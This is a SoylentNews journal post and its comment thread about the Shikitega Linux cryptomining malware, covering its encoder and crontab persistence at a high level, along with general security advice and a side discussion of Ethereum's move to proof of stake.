Stories
Slash Boxes
Comments

SoylentNews is people

The Fine print: The following are owned by whoever posted them. We are not responsible for them in any way.

Four Seasons Hand

Journal by Mojibake Tengu

A new brand of Linux malware nicked Shikitega happened, and quite well documented by AT&T Alien Labs analysis:

https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux

Well, I would not call a crontab persistence a stealthy method, but maybe I am just getting too old and this really is stealthy for current Linux youngsters.

What is interesting to me is the initial code mechanic, using the Shikata Ga Nai (means: On the Way) encoder. I grade this one as "not bad". Seen better coding styles, though.

Following stages are just common stuff, the overall thingy looks like many different quality codes glued together as contraption to build some kind of on-demand solution.

Since the Ethereum is changing algorithm from heavy GPU load to "low energy" one, I predict many more similar plagues against the Linux clouds will happen.

Four Seasons Hand | Log In/Create an Account | Top | 7 comments | Search Discussion
Display Options Threshold/Breakthrough Reply to Article Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
(1)

  • (Score: 3, Interesting) by RS3 on Friday September 16 2022, @02:28PM (3 children)

    by RS3 (6367) on Friday September 16 2022, @02:28PM (#1271979)

    Thanks. I skimmed / read TFA and it's pretty good, great reverse-engineering and analysis. What I like is they actually tell you what files to look for and where. Far too many malware articles babble on and on about malware, patch and update, but rarely give you specific symptoms to look for.

    What's missing: they refer to the "infected system", but they don't tell you how the infection gets in. Maybe I missed it, but I looked a couple of times...

    • (Score: 0) by Anonymous Coward on Friday September 16 2022, @09:47PM (2 children)

      by Anonymous Coward on Friday September 16 2022, @09:47PM (#1272013)

      With malware like this, it isn't uncommon for there to be multiple vectors and even multiple parties using the same malware in different campaigns. Stuff like this is commonly bought and sold on the black market or leased in some for of *aaS scheme. With the precipitous rise in such services, now you have to analyze the initial infection and the payload as separate incidents because it is no longer the case that the payload tells you how it got in and vice versa.

      • (Score: 2) by RS3 on Saturday September 17 2022, @02:52AM (1 child)

        by RS3 (6367) on Saturday September 17 2022, @02:52AM (#1272056)

        Good answer, thanks. What I was trying to get at: how to be more safe. If you know the most common way a particular malware gets into a system, you might be able to take measures to reduce the vulnerability.

        • (Score: 0) by Anonymous Coward on Saturday September 17 2022, @04:31AM

          by Anonymous Coward on Saturday September 17 2022, @04:31AM (#1272065)

          How to be more safe is to follow proper security measures. Yes, it can be a pain in the ass to properly configure things, stay updated, keep your exposure to a minimum, don't attract unwanted attention, and understand the entire stack you are running, but ultimately it is the only way to be relatively safe. There are guides and rules on how to do it in particular but most don't care because the secure way isn't usually the easy way.

          In this instance in particular, the particular malware is a cryptominer. It is probably run as part of an illegal Mining as a service scheme. Given the intermediate C&C and dual intermediate payload, they probably paid a malware as a service provider to drop it. There may even be a third exploit as a service provider involved for the initial infection. There just isn't some magic bullet to keep you safe sort of not exposing random listening ports to the Internet, especially without the necessary security in between.

  • (Score: 2) by DeathMonkey on Friday September 16 2022, @04:48PM (1 child)

    by DeathMonkey (1380) on Friday September 16 2022, @04:48PM (#1271994) Journal

    How are we feeling about the Etherium news? My biggest complaint about BitCoin is the energy usage so is this thing the future?

    • (Score: 0) by Anonymous Coward on Saturday September 17 2022, @10:48PM

      by Anonymous Coward on Saturday September 17 2022, @10:48PM (#1272199)

      PoS is PoW, except you substitute "stakeholders" for "workers" and "amount of stake" for "amount of work." Theoretically, this means that it is vulnerable to the same attacks as PoW and has similar properties. Of course, the chosen algorithm affects what the exact security, efficiency, etc. picture looks like, with some performing better than others. It also has the side effect of automatically making those with the most currency even richer, in both currency due to the algorithm and real money due to the barrier of entry.

  • (Score: 3, Informative) by stormwyrm on Wednesday September 21 2022, @03:14AM

    by stormwyrm (717) on Wednesday September 21 2022, @03:14AM (#1272683) Journal

    Shikata ga nai (仕方がない) does not mean "on the way". It's a Japanese expression [wikipedia.org] that means "there's no other way", "it can't be helped", "it's no use (doing)", "unavoidable", or "inevitable". Usually used when something unpleasant has happened or is about to happen that one can't do anything about, or one is in difficult circumstances that one has to go through.

    --
    Numquam ponenda est pluralitas sine necessitate.
(1)